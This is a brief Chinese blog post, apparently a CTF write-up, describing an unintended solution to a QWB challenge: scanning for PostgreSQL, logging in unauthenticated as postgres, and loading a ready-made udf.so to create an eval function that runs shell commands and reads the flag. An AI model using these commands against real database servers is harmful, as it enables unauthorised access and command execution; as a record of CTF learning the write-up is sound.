web | postgresql 相关学习

Author Avatar
Aryb1n 3月 26, 2018

这次qwb就做了两三道题…差不多零输出…

有一道题目叫彩蛋…据说做出来的很多人都是非预期解出来..就是大概是这样子

  1. 先nmap扫一下发现5432端口的psql

  2. 然后尝试未授权登录

    psql -h 106.75.97.46 -U postgres
    
  3. 之后使用UDF…
    这里我不太会了…但目录下有一个现成的udf.so…可以用它create一个eval函数…

    postgres=# CREATE OR REPLACE FUNCTION my_eval()  RETURNS text AS  './udf.so' LANGUAGE C STRICT;
    

    然后, 执行命令就有flag了

    select my_eval('ls /')
    select my_eval('cat /flag_is_here')
    

    等有时间学一下这个udf….
    只有一篇rr大佬发过的文章 https://www.secpulse.com/archives/33105.html
    应该是wooyun也发过
    还有一篇 http://www.jianfensec.com/postgresql_getshell.html